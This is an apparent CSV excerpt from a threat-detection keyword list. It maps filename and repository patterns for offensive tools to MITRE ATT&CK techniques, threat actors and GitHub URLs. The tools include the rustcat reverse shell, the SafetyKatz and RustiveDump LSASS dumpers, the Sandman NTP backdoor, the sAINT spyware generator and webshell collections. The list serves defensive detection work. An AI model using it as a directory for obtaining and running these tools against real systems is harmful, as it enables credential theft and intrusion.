"*/rustcat/releases/latest/download/*",".{0,1000}\/rustcat\/releases\/latest\/download\/.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","10638"
"*/Rust-for-Malware-Development.git*",".{0,1000}\/Rust\-for\-Malware\-Development\.git.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","10642"
"*/rusthound.exe*",".{0,1000}\/rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","10643"
"*/RustHound.git*",".{0,1000}\/RustHound\.git.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","10644"
"*/RustiveDump.exe*",".{0,1000}\/RustiveDump\.exe.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","1","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","10645"
"*/RustiveDump.git*",".{0,1000}\/RustiveDump\.git.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","1","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","10646"
"*/RustPotato.git*",".{0,1000}\/RustPotato\.git.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","1","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","10647"
"*/RustRedOps.git*",".{0,1000}\/RustRedOps\.git.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10648"
"*/rvrsh3ll/*",".{0,1000}\/rvrsh3ll\/.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","10652"
"*/RWXfinder.git*",".{0,1000}\/RWXfinder\.git.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","10653"
"*/s3aclenum.py*",".{0,1000}\/s3aclenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10654"
"*/S3cur3Th1sSh1t/*",".{0,1000}\/S3cur3Th1sSh1t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","10655"
"*/s3enum.py*",".{0,1000}\/s3enum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10656"
"*/S3Scanner.git*",".{0,1000}\/S3Scanner\.git.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","10657"
"*/S4UTomato.git*",".{0,1000}\/S4UTomato\.git.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","10659"
"*/s72 Shell v1.1 Coding.php*",".{0,1000}\/s72\sShell\sv1\.1\sCoding\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10660"
"*/s7-info.nse*",".{0,1000}\/s7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10661"
"*/saefko.profile*",".{0,1000}\/saefko\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10662"
"*/Safer_PoC_CVE*",".{0,1000}\/Safer_PoC_CVE.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","N/A","1","44","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z","10663"
"*/SafetyDump.exe*",".{0,1000}\/SafetyDump\.exe.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","1","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","10664"
"*/SafetyDump.git*",".{0,1000}\/SafetyDump\.git.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","1","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","10665"
"*/SafetyKatz.dll*",".{0,1000}\/SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","10666"
"*/SafetyKatz.dll*",".{0,1000}\/SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10667"
"*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10668"
"*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10669"
"*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10670"
"*/SafetyKatz.git*",".{0,1000}\/SafetyKatz\.git.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","10671"
"*/sAINT.git*",".{0,1000}\/sAINT\.git.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","10672"
"*/sAINT-master.zip*",".{0,1000}\/sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","10673"
"*/Sako RAT.exe*",".{0,1000}\/Sako\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10674"
"*/sam_dump_*.txt*",".{0,1000}\/sam_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10675"
"*/sambaPipe.py*",".{0,1000}\/sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10676"
"*/samba-vuln-cve-2012-1182.nse*",".{0,1000}\/samba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10677"
"*/samdump.go*",".{0,1000}\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","10678"
"*/samdump2*",".{0,1000}\/samdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","10679"
"*/sampasswd*",".{0,1000}\/sampasswd.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10680"
"*/samrdump.exe*",".{0,1000}\/samrdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10681"
"*/samrdump.py*",".{0,1000}\/samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10682"
"*/samruser.py*",".{0,1000}\/samruser\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","10683"
"*/samusrgrp.*",".{0,1000}\/samusrgrp\..{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10684"
"*/sandcat.git*",".{0,1000}\/sandcat\.git.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","10685"
"*/Sandman.exe*",".{0,1000}\/Sandman\.exe.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10686"
"*/sandman_server.py*",".{0,1000}\/sandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10687"
"*/SandmanBackdoorTimeProvider.dll*",".{0,1000}\/SandmanBackdoorTimeProvider\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10688"
"*/Sandman-master.zip*",".{0,1000}\/Sandman\-master\.zip.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10689"
"*/sap_default.txt*",".{0,1000}\/sap_default\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10690"
"*/SauronEye.exe*",".{0,1000}\/SauronEye\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10691"
"*/SauronEye.exe*",".{0,1000}\/SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10692"
"*/saycheese.html*",".{0,1000}\/saycheese\.html.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","10693"
"*/saycheese.sh*",".{0,1000}\/saycheese\.sh.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","10694"
"*/sbin/chntpw*",".{0,1000}\/sbin\/chntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10695"
"*/sbin/sampasswd*",".{0,1000}\/sbin\/sampasswd.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10697"
